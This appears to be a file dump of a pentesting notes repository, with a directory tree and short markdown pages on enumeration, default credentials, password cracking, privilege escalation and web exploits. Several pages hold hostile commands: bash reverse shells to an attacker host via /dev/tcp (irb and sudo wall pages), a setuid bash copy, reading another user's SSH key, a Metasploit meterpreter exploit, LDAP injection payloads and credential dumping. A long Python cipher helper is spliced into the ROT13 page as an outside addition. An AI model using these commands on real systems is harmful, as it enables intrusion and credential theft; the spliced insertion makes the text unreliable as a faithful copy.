```txt
├── CNAME
├── .gitignore
├── docs
│   ├── assets
│   │   ├── icon.png
│   │   └── icon-nobg.png
│   ├── exploit
│   │   ├── web
│   │   │   ├── cms
│   │   │   │   ├── fuel.md
│   │   │   │   ├── concrete.md
│   │   │   │   ├── index.md
│   │   │   │   ├── bolt.md
│   │   │   │   ├── subrion.md
│   │   │   │   ├── mara.md
│   │   │   │   ├── cockpit.md
│   │   │   │   └── typo3.md
│   │   │   ├── xst.md
│   │   │   ├── opencats.md
│   │   │   ├── waf-detection.md
│   │   │   ├── restaurant-management-system.md
│   │   │   ├── limesurvey.md
│   │   │   ├── atlassian-confluence.md
│   │   │   ├── file-upload-attack-on-imagemagick.md
│   │   │   ├── framework
│   │   │   │   ├── apache-struts.md
│   │   │   │   ├── blazor.md
│   │   │   │   ├── angular.md
│   │   │   │   ├── django.md
│   │   │   │   ├── ajp.md
│   │   │   │   ├── tornado.md
│   │   │   │   ├── pickle-rce.md
│   │   │   │   └── spring-cloud.md
│   │   │   ├── llm-chatbot.md
│   │   │   ├── elasticsearch
│   │   │   │   ├── kibana.md
│   │   │   │   └── index.md
│   │   │   ├── browser
│   │   │   │   ├── extract-web-browser-passwords.md
│   │   │   │   └── firefox.md
│   │   │   ├── sql-injection.md
│   │   │   ├── http-header-injection.md
│   │   │   ├── erb-ssti.md
│   │   │   ├── php-rce-cheat-sheet.md
│   │   │   ├── tool
│   │   │   │   ├── socks-proxy-in-burpsuite.md
│   │   │   │   ├── burpsuite-troubleshooting.md
│   │   │   │   └── add-custom-http-headers.md
│   │   │   ├── wkhtmltopdf-ssrf.md
│   │   │   ├── insecure-deserialization.md
│   │   │   ├── webmin.md
│   │   │   ├── codiad.md
│   │   │   ├── host-header-attack.md
│   │   │   ├── http-rate-limit-bypass.md
│   │   │   ├── template-engine
│   │   │   │   └── jsrender-template-injection.md
│   │   │   ├── dom-cloberring.md
│   │   │   ├── apache-activemq.md
│   │   │   ├── code-deobfuscation.md
│   │   │   ├── cacti.md
│   │   │   ├── cgi.md
│   │   │   ├── jenkins.md
│   │   │   ├── jboss.md
│   │   │   ├── webdav.md
│   │   │   ├── bookmarklet.md
│   │   │   ├── session-fixation.md
│   │   │   ├── idor-attack.md
│   │   │   ├── clipbucket.md
│   │   │   ├── latex-injection.md
│   │   │   ├── ghostscript.md
│   │   │   ├── business-logic-attack.md
│   │   │   ├── client-server-side-filter-bypass.md
│   │   │   ├── ssti.md
│   │   │   ├── web-server-misconfiguration.md
│   │   │   ├── apache-zeppelin.md
│   │   │   ├── broken-link-hijacking.md
│   │   │   ├── php-filters-chain.md
│   │   │   ├── webanno.md
│   │   │   ├── microsoft-exchange-server.md
│   │   │   ├── open-redirect.md
│   │   │   ├── file-upload-attack-on-exiftool.md
│   │   │   ├── go-ssti.md
│   │   │   ├── cookie-hijacking.md
│   │   │   ├── php-srand-time-guessing.md
│   │   │   ├── tiny-file-manager.md
│   │   │   ├── php-hash_hmac_bypass.md
│   │   │   └── dump-git-repository-from-website.md
│   │   ├── backup
│   │   │   └── borg.md
│   │   ├── network
│   │   │   ├── protocol
│   │   │   │   ├── dhcp.md
│   │   │   │   ├── modbus.md
│   │   │   │   ├── waste.md
│   │   │   │   ├── irc.md
│   │   │   │   ├── upnp.md
│   │   │   │   ├── pptp.md
│   │   │   │   ├── tftp.md
│   │   │   │   ├── memcache.md
│   │   │   │   ├── telnet.md
│   │   │   │   ├── ntp.md
│   │   │   │   ├── rtsp.md
│   │   │   │   ├── snmp.md
│   │   │   │   ├── vnc.md
│   │   │   │   └── amqp.md
│   │   │   ├── ethernetip.md
│   │   │   ├── tool
│   │   │   │   ├── decrypt-solarputty-sessions-files.md
│   │   │   │   ├── tshark.md
│   │   │   │   └── convert-putty-key-to-openssh-key.md
│   │   │   ├── vpn
│   │   │   │   └── ipsec-vpn.md
│   │   │   ├── grpc.md
│   │   │   ├── wifi
│   │   │   │   └── wifi-password-recovery.md
│   │   │   ├── shell
│   │   │   │   ├── reverse-shell-using-pwncat.md
│   │   │   │   ├── fully-interactive-tty.md
│   │   │   │   └── reverse-shell-using-metasploit.md
│   │   │   ├── port-forwarding
│   │   │   │   └── plink.md
│   │   │   ├── arp-spoofing.md
│   │   │   ├── firewall.md
│   │   │   ├── redos.md
│   │   │   └── fastcgi.md
│   │   ├── cryptography
│   │   │   ├── algorithm
│   │   │   │   ├── atbash-cipher.md
│   │   │   │   ├── rot13-rot47.md
│   │   │   │   ├── pkcs.md
│   │   │   │   ├── pgp.md
│   │   │   │   ├── kerberos-tgt-cracking.md
│   │   │   │   ├── kdbx-files.md
│   │   │   │   ├── ansible-vault-secret.md
│   │   │   │   ├── aes-cbc-padding-oracle-attack.md
│   │   │   │   ├── rpng-guessing.md
│   │   │   │   ├── sha1-hash-collision-attack.md
│   │   │   │   └── des.md
│   │   │   ├── math
│   │   │   │   ├── modular-congruence.md
│   │   │   │   ├── exponentiation.md
│   │   │   │   ├── quadratic-residue.md
│   │   │   │   └── chinese-remainder-theorem.md
│   │   │   ├── key-derivation-functions
│   │   │   │   ├── scrypt.md
│   │   │   │   └── bcrypt.md
│   │   │   └── tool
│   │   │       └── pwsafe.md
│   │   ├── hardware
│   │   │   ├── gerber-files.md
│   │   │   ├── netgear.md
│   │   │   ├── sal-logic-analysis.md
│   │   │   └── firmware-analysis.md
│   │   ├── linux
│   │   │   ├── privilege-escalation
│   │   │   │   ├── irb.md
│   │   │   │   ├── sssd.md
│   │   │   │   ├── sudo
│   │   │   │   │   ├── wall.md
│   │   │   │   │   ├── screen.md
│   │   │   │   │   ├── umount.md
│   │   │   │   │   ├── sudoedit.md
│   │   │   │   │   ├── path-traversal.md
│   │   │   │   │   ├── java.md
│   │   │   │   │   ├── shutdown-poweroff.md
│   │   │   │   │   ├── fail2ban-command.md
│   │   │   │   │   ├── tee.md
│   │   │   │   │   ├── vim.md
│   │   │   │   │   ├── clamav.md
│   │   │   │   │   ├── reboot.md
│   │   │   │   │   ├── openvpn.md
│   │   │   │   │   ├── curl.md
│   │   │   │   │   └── dstat.md
│   │   │   │   ├── gnuplot.md
│   │   │   │   ├── doas.md
│   │   │   │   ├── rust.md
│   │   │   │   ├── python-eval.md
│   │   │   │   ├── shared-library-hijacking.md
│   │   │   │   ├── apache-conf.md
│   │   │   │   ├── updated-motd.md
│   │   │   │   ├── ruby.md
│   │   │   │   ├── tar-wildcard.md
│   │   │   │   ├── python-jails-escape.md
│   │   │   │   ├── python-yaml.md
│   │   │   │   └── chrome-remote-debugger.md
│   │   │   ├── x11.md
│   │   │   ├── ghidra-debug-mode-rce.md
│   │   │   ├── post-exploitation
│   │   │   │   └── cover-your-tracks.md
│   │   │   └── forkbomb.md
│   │   ├── dns
│   │   │   └── mdns.md
│   │   ├── windows
│   │   │   ├── active-directory
│   │   │   │   ├── netlogon-elevasion.md
│   │   │   │   ├── ldap-injection.md
│   │   │   │   ├── asrep-roasting.md
│   │   │   │   └── constrained-delegation-attack.md
│   │   │   ├── privilege-escalation
│   │   │   │   ├── dumping-credentials-.md
│   │   │   │   ├── switch-user.md
│   │   │   │   ├── login-windows-shell.md
│   │   │   │   ├── spn-jacking.md
│   │   │   │   ├── manageengine-adselfservice-plus.md
│   │   │   │   └── dumping-windows-password-hashes.md
│   │   │   ├── forensics
│   │   │   │   └── onedrive-logs.md
│   │   │   └── wsl.md
│   │   ├── audio
│   │   │   ├── sstv.md
│   │   │   └── spectrogram.md
│   │   ├── blockchain
│   │   │   ├── smart-contract
│   │   │   │   ├── solidity-overflow-and-underflow.md
│   │   │   │   ├── self-destruct-attack.md
│   │   │   │   ├── contract-address-recovery.md
│   │   │   │   ├── denial-of-service-attack.md
│   │   │   │   ├── index.md
│   │   │   │   └── solidity-assembly.md
│   │   │   └── ethereum
│   │   │       └── python.md
│   │   ├── game
│   │   │   ├── minecraft-server.md
│   │   │   ├── chess-game-cheating.md
│   │   │   └── webassembly-games-hacking.md
│   │   ├── archives
│   │   │   ├── rar.md
│   │   │   ├── tar.md
│   │   │   ├── 7z-password-cracking.md
│   │   │   └── zip-unzip.md
│   │   ├── steganography
│   │   │   └── morse-ocr.md
│   │   ├── virtual-machine
│   │   │   └── vm-escape.md
│   │   ├── machine-learning
│   │   │   ├── data-processing
│   │   │   │   ├── data-visualization.md
│   │   │   │   ├── dimensionality-reduction.md
│   │   │   │   └── cluster-analysis.md
│   │   │   ├── model
│   │   │   │   └── pickle-code-injection.md
│   │   │   ├── read-pt.md
│   │   │   ├── computer-vision
│   │   │   │   ├── image-recognition-bypass.md
│   │   │   │   ├── image-manipulation.md
│   │   │   │   └── image-analysis.md
│   │   │   ├── orange-data-mining.md
│   │   │   └── read-hdf5.md
│   │   ├── email
│   │   │   ├── imap.md
│   │   │   └── pop.md
│   │   ├── database
│   │   │   ├── sqlite.md
│   │   │   └── couchdb.md
│   │   ├── version-control
│   │   │   └── git
│   │   │       └── gogs.md
│   │   ├── container
│   │   │   └── docker
│   │   │       ├── docker-registry.md
│   │   │       └── moby-docker-engine-privilege-escalation.md
│   │   ├── printer
│   │   │   ├── raw-printing.md
│   │   │   └── ipp.md
│   │   ├── cloud
│   │   │   ├── gcp.md
│   │   │   └── azure.md
│   │   └── reconnaissance
│   │       ├── osint
│   │       │   ├── imint-geoint.md
│   │       │   └── github-dorks.md
│   │       └── subdomain
│   │           └── subdomain-discovery.md
│   └── disclaimer.md
├── requirements.txt
├── mkdocs.yml
├── .github
│   └── workflows
│       └── ci.yml
└── LICENSE
```

--------------------------------------------------------------------------------
/CNAME:
--------------------------------------------------------------------------------
```txt
exploit-notes.hdks.org
```

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
```txt
.cache/
.vscode/
.venv/

site/
```

--------------------------------------------------------------------------------
/docs/assets/icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hdks-bug/exploit-notes/HEAD/docs/assets/icon.png

--------------------------------------------------------------------------------
/docs/assets/icon-nobg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hdks-bug/exploit-notes/HEAD/docs/assets/icon-nobg.png

--------------------------------------------------------------------------------
/docs/exploit/web/cms/fuel.md:
--------------------------------------------------------------------------------
# FUEL CMS Pentesting

FUEL is a content management system (CMS).
## Default Credential

```txt
admin:admin
```

--------------------------------------------------------------------------------
/docs/exploit/web/cms/concrete.md:
--------------------------------------------------------------------------------
# Concrete CMS Pentesting

Concrete CMS is a content management system for publishing content.

## Default Credentials

The default username is **"admin"** in Concrete5.

--------------------------------------------------------------------------------
/docs/exploit/backup/borg.md:
--------------------------------------------------------------------------------
# BorgBackup Pentesting

A deduplicating backup program.

## Extract Archives

```sh
# Borg addresses an archive as REPOSITORY::ARCHIVE
borg extract /path/to/repo::<archive-name>
Enter passphrase:
```

--------------------------------------------------------------------------------
/docs/exploit/web/xst.md:
--------------------------------------------------------------------------------
# XST (Cross-Site Tracing)

XST is a web security vulnerability that exploits the HTTP TRACE method, which echoes the received request (headers included) back to the client.

## Add Cookie Header

```http
TRACE / HTTP/1.1
...
Cookie: name=value
...
```

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/dhcp.md:
--------------------------------------------------------------------------------
# DHCP (Dynamic Host Configuration Protocol) Pentesting

DHCP uses UDP. Port 67 is used by the server and port 68 by the client.

## Enumeration

```sh
nmap -sU --script broadcast-dhcp-discover -p 67,68
```

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/modbus.md:
--------------------------------------------------------------------------------
# Modbus Pentesting

Modbus is a data communications protocol. The default port is 502.
## Enumeration

```bash
nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502 <target-ip>
```

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/waste.md:
--------------------------------------------------------------------------------
# WASTE Pentesting

A peer-to-peer, end-to-end protocol and software application. The ports often used are 1337 and 31337.

## Connect

```sh
connect <target-ip> 1337
# or
nc <target-ip> 1337
```

--------------------------------------------------------------------------------
/docs/exploit/cryptography/algorithm/atbash-cipher.md:
--------------------------------------------------------------------------------
# Atbash Cipher

The Atbash cipher is a monoalphabetic substitution cipher originally used to encrypt the Hebrew alphabet.

## Online Tools

- **[Atbash Cipher Tool](https://www.boxentriq.com/code-breaking/atbash-cipher)**

--------------------------------------------------------------------------------
/docs/exploit/network/ethernetip.md:
--------------------------------------------------------------------------------
# EtherNet/IP Pentesting

EtherNet/IP is an industrial network protocol that adapts the Common Industrial Protocol (CIP) to standard Ethernet. The default port is 44818.

## Enumeration

```bash
nmap --script enip-info -p 44818 <target-ip>
```

--------------------------------------------------------------------------------
/docs/exploit/hardware/gerber-files.md:
--------------------------------------------------------------------------------
# Gerber (GBR) Files

The Gerber format is an ASCII vector format for printed circuit board (PCB) designs.

## Gerber Viewer

There are many online tools for viewing GBR files.
- [Online Gerber Viewer](https://www.pcbway.com/project/OnlineGerberViewer.html)

--------------------------------------------------------------------------------
/docs/exploit/network/tool/decrypt-solarputty-sessions-files.md:
--------------------------------------------------------------------------------
# Decrypt SolarPuTTY Sessions Files

## Decrypt

The Python script is here: [xHacka's SolarPuttyDecrypt.py](https://gist.github.com/xHacka/052e4b09d893398b04bf8aff5872d0d5)

```sh
python3 SolarPuTTYDecrypt.py sessions.dat wordlist.txt
```

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/irc.md:
--------------------------------------------------------------------------------
# IRC (Internet Relay Chat) Pentesting

IRC is a protocol that allows text-based communication between multiple parties. Default ports are 194 and 6667.

## Enumeration

```bash
nmap --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194 <target-ip>
```

--------------------------------------------------------------------------------
/docs/exploit/web/opencats.md:
--------------------------------------------------------------------------------
# OpenCATS Pentesting

OpenCATS is an Applicant Tracking System designed for recruiters to manage the recruiting process, from job posting and candidate application through to candidate selection and submission.

## Default Credentials

```txt
admin:admin
admin:cats
```

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/irb.md:
--------------------------------------------------------------------------------
# irb (Interactive Ruby Shell) Privilege Escalation

## Exploitation

```bash
irb

# %q!...! is a Ruby string literal delimited by "!"
> exec %q!whoami!
> exec %q!cp /bin/bash /tmp/bash; chmod +s /tmp/bash!
> exec %q!bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"!
```

--------------------------------------------------------------------------------
/docs/exploit/linux/x11.md:
--------------------------------------------------------------------------------
# X11 (X Window System) Pentesting

X Window System is a windowing system for bitmap displays, common on Unix-like operating systems. Default ports are 6000 and 6001.

## Enumeration

```bash
nmap --script x11-access -p 6000 <target-ip>

msf> use auxiliary/scanner/x11/open_x11
```

--------------------------------------------------------------------------------
/docs/exploit/web/waf-detection.md:
--------------------------------------------------------------------------------
# WAF (Web Application Firewall) Detection

A WAF (Web Application Firewall) is a specific form of application firewall that filters, monitors, and blocks HTTP traffic to and from a web service.

## Automation

```bash
nmap --script=http-waf-fingerprint example.com

wafw00f https://example.com
```

--------------------------------------------------------------------------------
/docs/exploit/hardware/netgear.md:
--------------------------------------------------------------------------------
# NETGEAR Pentesting

NETGEAR produces networking hardware for consumers, businesses, and service providers.
## Enumeration

```sh
nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502 <target-ip>
```

## Default Credentials

```txt
admin:password
```

--------------------------------------------------------------------------------
/docs/exploit/dns/mdns.md:
--------------------------------------------------------------------------------
# mDNS (Multicast DNS) Pentesting

Multicast DNS resolves hostnames to IP addresses within small networks that do not include a local name server. It is a zero-configuration (zeroconf) service. It uses UDP. The default port is 5353.

## Enumeration

```sh
nmap -sU --script dns-service-discovery -p 5353 <target-ip>
```

--------------------------------------------------------------------------------
/docs/exploit/windows/active-directory/netlogon-elevasion.md:
--------------------------------------------------------------------------------
# Netlogon Elevation

This is an elevation-of-privilege vulnerability in Windows Netlogon that is exploited through the Netlogon Remote Protocol (MS-NRPC). It is called Zerologon (CVE-2020-1472).

## Exploitation

There are many PoCs available online.
Here, we will use [this repository](https://github.com/dirkjanm/CVE-2020-1472) from GitHub.

--------------------------------------------------------------------------------
/docs/exploit/audio/sstv.md:
--------------------------------------------------------------------------------
# SSTV (Slow-scan Television)

SSTV is a picture transmission method used by amateur radio operators. We can extract pictures from audio files.

## Decode SSTV

Some tools are available, as listed below.
- **MMSSTV** (for Windows)
- **QSSTV** (for Linux)
- **[sstv](https://github.com/colaclanth/sstv)** (command-line tool)

--------------------------------------------------------------------------------
/docs/exploit/web/restaurant-management-system.md:
--------------------------------------------------------------------------------
# Restaurant Management System (RMS) Pentesting

## Remote Code Execution (RCE) v1.0

See [Exploit-DB](https://www.exploit-db.com/exploits/47520) for details.

```bash
python3 rms-rce.py https://example.com/rms/
```

When the upload succeeds, we can access https://example.com/rms/images/reverse-shell.php?cmd=id

--------------------------------------------------------------------------------
/docs/exploit/web/limesurvey.md:
--------------------------------------------------------------------------------
# LimeSurvey Pentesting

LimeSurvey is a statistical survey web app written in PHP, backed by a MySQL, SQLite, PostgreSQL or MSSQL database.

## Default Credentials

```txt
admin:password
```

## Remote Code Execution (RCE) version < 3.16

Reference: [https://www.exploit-db.com/exploits/46634](https://www.exploit-db.com/exploits/46634)

--------------------------------------------------------------------------------
/docs/exploit/blockchain/smart-contract/solidity-overflow-and-underflow.md:
--------------------------------------------------------------------------------
# Solidity Overflow & Underflow

Solidity is vulnerable to overflow and underflow of `uint` variables in versions < 0.8.
## Overflow

```solidity
uint8 value = 255;
value++;
// Result: value = 0
```

## Underflow

```solidity
uint8 value = 0;
value--;
// Result: value = 255
```

--------------------------------------------------------------------------------
/docs/exploit/web/atlassian-confluence.md:
--------------------------------------------------------------------------------
# Atlassian Confluence Pentesting

Atlassian Confluence is a collaboration wiki tool used to help teams collaborate and share knowledge efficiently.

## Remote Code Execution (CVE-2022-26134)

Download the exploit from the [repo](https://github.com/h3v0x/CVE-2022-26134).

```sh
python3 exploit.py -u http://<target> -c whoami
```

--------------------------------------------------------------------------------
/docs/exploit/cryptography/algorithm/rot13-rot47.md:
--------------------------------------------------------------------------------
# ROT13, ROT47

ROT13 (rotate by 13 places) and ROT47 (rotate by 47 places) are simple letter substitution ciphers.

## Decode

**[CyberChef](https://gchq.github.io/CyberChef/)** is a useful online tool for decoding ROT13 and ROT47.
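The same substitutions the Atbash and ROT13/ROT47 pages above delegate to online tools, implemented locally in Python as an added example (not code from the exploit-notes repository), so CTF data never has to be pasted into a third-party site; it also generalises ROT13 to any shift and brute-forces an unknown rotation. `atbash`, `rot_n`, `rot47`, `rot_brute_force` and the hint-word scorer are this example's own names.

```python
"""Atbash, ROT13, ROT47 and general ROT-n encode/decode (added example)."""
import string

_LOWER = string.ascii_lowercase
_UPPER = string.ascii_uppercase


def atbash(text: str) -> str:
    """Atbash maps a<->z, b<->y, ... (case preserved); it is its own inverse."""
    out = []
    for ch in text:
        if ch in _LOWER:
            out.append(_LOWER[25 - _LOWER.index(ch)])
        elif ch in _UPPER:
            out.append(_UPPER[25 - _UPPER.index(ch)])
        else:
            out.append(ch)  # digits, spaces and punctuation pass through
    return "".join(out)


def rot_n(text: str, n: int) -> str:
    """Rotate letters by n places (mod 26), keeping case; non-letters pass through.

    rot_n(s, 13) is the same mapping as the page's tr 'A-Za-z' 'N-ZA-Mn-za-m'.
    """
    n %= 26
    out = []
    for ch in text:
        if ch in _LOWER:
            out.append(_LOWER[(_LOWER.index(ch) + n) % 26])
        elif ch in _UPPER:
            out.append(_UPPER[(_UPPER.index(ch) + n) % 26])
        else:
            out.append(ch)
    return "".join(out)


def rot13(text: str) -> str:
    """ROT13: encode and decode are the same operation because 13 + 13 = 26."""
    return rot_n(text, 13)


def rot47(text: str) -> str:
    """ROT47 rotates the 94 printable ASCII characters '!' (33) .. '~' (126) by 47.

    Digits and punctuation are substituted too, and 47 + 47 = 94 makes it
    its own inverse, just like ROT13 over the 26-letter alphabet.
    """
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + 47) % 94))
        else:
            out.append(ch)  # space, newline and non-ASCII pass through
    return "".join(out)


def rot_brute_force(ciphertext: str) -> dict:
    """Return every candidate plaintext for an unknown letter rotation, keyed by shift."""
    return {shift: rot_n(ciphertext, shift) for shift in range(1, 26)}


def likely_rot_shift(ciphertext: str, hints=("the", "flag", "and")) -> int:
    """Pick the shift whose candidate contains the most hint words.

    A crude English score is enough for short CTF strings; ties keep the
    lowest shift, and 0 means no candidate contained a hint word.
    """
    best_shift, best_score = 0, 0
    for shift, candidate in rot_brute_force(ciphertext).items():
        words = candidate.lower().split()
        score = sum(words.count(h) for h in hints)
        if score > best_score:
            best_shift, best_score = shift, score
    return best_shift


if __name__ == "__main__":
    print(rot13("hello"))          # uryyb, identical to the tr command above
    print(atbash("Hello, World"))  # Svool, Dliow
    print(rot47("Hello, World!"))  # w6==@[ (@C=5P
    unknown = rot_n("the flag is here and the key", 7)
    shift = likely_rot_shift(unknown)
    print(shift, rot_n(unknown, shift))  # 19 the flag is here and the key
```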
## Encode

### ROT13

```sh
echo hello | tr 'A-Za-z' 'N-ZA-Mn-za-m'
```

--------------------------------------------------------------------------------
/docs/exploit/windows/privilege-escalation/dumping-credentials-.md:
--------------------------------------------------------------------------------
# Dumping Credentials via keymgr.dll

The keymgr.dll library exposes all stored credentials on the host.

## Dump

```cmd
rundll32 keymgr.dll, KRShowKeyMgr
```

## References

- [Vx Underground](https://samples.vx-underground.org/Papers/Windows/Data%20Theft/2022-04-19%20-%20Dumping%20passwords%20using%20KRShowKeyMgr.PNG)

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/sssd.md:
--------------------------------------------------------------------------------
# SSSD Privilege Escalation

SSSD (System Security Services Daemon) provides a set of daemons to manage access to remote directory services and authentication mechanisms.

## Find Credentials

```bash
ls -la /var/lib/sss/

# Look for cached credentials in the LDB database files.
# If we find a hash, crack it using John or Hashcat.
strings /var/lib/sss/db/example.ldb
```

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/upnp.md:
--------------------------------------------------------------------------------
# UPnP (Universal Plug and Play) Pentesting

UPnP is a network protocol that allows devices to discover and interact with each other seamlessly over a local network. Default ports are 1900 (UDP) and 5000 (TCP).
## Enumeration

```bash
nmap -sU --script upnp-info -p 1900 <target-ip>
nmap --script upnp-info -p 5000 <target-ip>
nmap --script broadcast-upnp-info -p 1900
```

--------------------------------------------------------------------------------
/docs/exploit/game/minecraft-server.md:
--------------------------------------------------------------------------------
# Minecraft Server Pentesting

A Minecraft server is a player-owned or business-owned multiplayer game server. The default port is 25565.

## Run a Server

```bash
# Create the screen session
screen -C

# Reattach to the session
screen -r
```

## Commands in the Server

```bash
# Print usage
help
```

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/pptp.md:
--------------------------------------------------------------------------------
# PPTP Pentesting

PPTP is one of the first VPN protocols. It relies on the MPPE (Microsoft Point-to-Point Encryption) protocol. The default port is 1723.

## Enumeration

```bash
nmap --script pptp-version -p 1723 <target-ip>
```

## References

- [Common VPN Vulnerabilities and Exploits](https://www.linkedin.com/pulse/common-vpn-vulnerabilities-exploits-abed-a-a-)

--------------------------------------------------------------------------------
/docs/exploit/archives/rar.md:
--------------------------------------------------------------------------------
# RAR (Roshal Archive)

RAR is a proprietary archive file format that supports data compression, error correction and file spanning.

## Decrypt

First, you need to convert the RAR file into a hash format that John can recognize.

```sh
rar2john example.rar > hash.txt
```

Crack the password using the converted hash.
```sh
john --wordlist=wordlist.txt hash.txt
```

--------------------------------------------------------------------------------
/docs/exploit/cryptography/algorithm/pkcs.md:
--------------------------------------------------------------------------------
# PKCS (Public-Key Cryptography Standards)

PKCS is a group of public-key cryptography standards.

## Decrypt

### PKCS#12

First, you need to convert the PKCS#12 file into a hash format that John can recognize.

```sh
pfx2john example.pfx > hash.txt
```

Crack the password using the converted hash.

```sh
john --wordlist=wordlist.txt hash.txt
```

--------------------------------------------------------------------------------
/docs/exploit/web/cms/index.md:
--------------------------------------------------------------------------------
# CMS (Content Management System) Pentesting

A CMS (Content Management System) is software used to manage the creation and modification of digital content.

## CMS Detection

If you don't know which CMS a target website uses, you can detect it with **[CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)**, an automatic CMS detection tool.

```sh
cmseek -u vulnerable.com
```

--------------------------------------------------------------------------------
/docs/exploit/web/cms/bolt.md:
--------------------------------------------------------------------------------
# Bolt CMS Pentesting

Bolt is an open-source content management system based on PHP.
## Login Page

```txt
/bolt
```

## Remote Code Execution (v3.7.1)

```sh
msfconsole
msf> use exploit/unix/webapp/bolt_authenticated_rce
msf> set lhost <local-ip>
msf> set rhosts <target-ip>
msf> set username <username>
msf> set password <password>
msf> run
```

--------------------------------------------------------------------------------
/docs/exploit/web/file-upload-attack-on-imagemagick.md:
--------------------------------------------------------------------------------
# File Upload Attack on ImageMagick

If a website uses ImageMagick to analyze or modify uploaded images, we might be able to execute remote code.

This page has no content yet, but please refer to the references below to achieve this attack.

## References

- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Picture%20ImageMagick)

--------------------------------------------------------------------------------
/docs/exploit/network/protocol/tftp.md:
--------------------------------------------------------------------------------
# TFTP (Trivial File Transfer Protocol) Pentesting

TFTP is a simple lockstep file transfer protocol which allows a client to get a file from or put a file onto a remote host. It uses UDP. The default port is 69.

## Enumeration

```sh
nmap -sU --script tftp-enum -p 69 <target-ip>
```

## Configuration Files

```bash
cat /etc/inetd.conf
# or
cat /etc/xinetd.d/tftp
```

--------------------------------------------------------------------------------
/docs/exploit/steganography/morse-ocr.md:
--------------------------------------------------------------------------------
# Morse OCR

If a picture contains Morse code, we can read it and translate it into human-readable strings.
## Morse OCR

[morse-ocr](https://github.com/eauxfolles/morse-ocr) is a useful Python script for reading and translating Morse code from a picture.

```bash
python3 mocr.py example.png
```

## References

- [Wikimedia](https://commons.wikimedia.org/wiki/File:International_Morse_Code.PNG)

--------------------------------------------------------------------------------
/docs/exploit/web/framework/apache-struts.md:
--------------------------------------------------------------------------------
# Apache Struts Pentesting

An open-source web application framework for developing Java EE web applications.

## Struts2 OGNL Elevation

Metasploit is useful for exploiting this.

```sh
msfconsole
msf > use multi/http/struts2_content_type_ognl
msf > set payload linux/x86/meterpreter/reverse_tcp
msf > exploit

meterpreter > shell
SHELL=/bin/bash script -q /dev/null
```

--------------------------------------------------------------------------------
/docs/exploit/web/llm-chatbot.md:
--------------------------------------------------------------------------------
# LLM Chatbot Pentesting

An LLM chatbot in a web application can be abused with some exploit techniques.

## SSTI

If the chatbot reflects our prompt in the response, we might be able to abuse it with SSTI. For example:

```txt
Prompt: How are you? {{ 2*3 }}

Response: I will answer your question "How are you? 6". I'm good, thanks! How about you?
```

If it works, we can achieve a reverse shell.
--------------------------------------------------------------------------------
/docs/exploit/network/vpn/ipsec-vpn.md:
--------------------------------------------------------------------------------
# IPsec VPN Pentesting

IPsec (Internet Protocol Security) is a secure network protocol suite that authenticates and encrypts packets of data to provide secure encrypted communication between two computers over an Internet Protocol network. It is used in VPNs (Virtual Private Networks). Default ports are 443 (SSL) and 500 (IPsec).

## Enumeration

```sh
nmap --script http-cisco-anyconnect -p 443 <target-ip>
# IKE runs over UDP, so the scan needs -sU
nmap -sU --script ike-version -p 500 <target-ip>
```

--------------------------------------------------------------------------------
/docs/exploit/windows/active-directory/ldap-injection.md:
--------------------------------------------------------------------------------
# LDAP Injection

LDAP may be vulnerable to query injection if a website does not properly validate user input.

## Basic Payloads

```txt
(&uid=*)(userPassword=*)
(&uid=*)|(userPassword=*)
(&uid=*)|(objectClass=*)(userPassword=password123)

*)(uid=*))(|(password=*)
```

## References

- [InfoSec Writeups](https://infosecwriteups.com/for-newbies-simple-examples-of-ldap-injection-vulnerabilities-cbf231431923)

--------------------------------------------------------------------------------
/docs/exploit/cryptography/math/modular-congruence.md:
--------------------------------------------------------------------------------
# Modular Congruence

## Basic

In modular congruence, the following rule applies:

```txt
If a ≡ b (mod c), then b ≡ a (mod c)
```

So, given the following problem,

```txt
39 ≡ x (mod 8)
```

we can find the value of **`x`** as below using Python.
```python
x = 39 % 8
print(x)
```

## References

- [CryptoHack](https://cryptohack.org/courses/modular/ma0/)

--------------------------------------------------------------------------------
/docs/exploit/virtual-machine/vm-escape.md:
--------------------------------------------------------------------------------
# VM (Virtual Machine) Escape

## Shared Folder

If the VM admin exposes a folder containing sensitive files as a Shared Folder, we can obtain sensitive information by accessing that folder.

### VirtualBox

```bash
# Linux
cd /media/sf_<share-name>

# Windows
cd \\VBOXSVR\<share-name>
```

### VMware

```bash
# Linux (VMware mounts shared folders under /mnt/hgfs)
cd /mnt/hgfs/<share-name>

# Windows
cd "\\vmware-host\Shared Folders\<share-name>"
```

--------------------------------------------------------------------------------
/docs/exploit/linux/privilege-escalation/sudo/wall.md:
--------------------------------------------------------------------------------
# Sudo Wall Privilege Escalation

The `wall` command can display the output of an OS command. Running it as root might be vulnerable to privilege escalation (PrivEsc).

## Investigation

```sh
sudo -l

(ALL) NOPASSWD: wall
```

## Exploitation

```sh
# Reverse shell
sudo wall "$(bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1')"

# Get the SSH private key of another user
sudo wall "$(cat /home/user/.ssh/id_rsa)"
```

--------------------------------------------------------------------------------
/docs/exploit/blockchain/smart-contract/self-destruct-attack.md:
--------------------------------------------------------------------------------
# Self-Destruct Attack

Solidity's `selfdestruct` function may be used by an attacker to destruct a target contract and steal the balance.
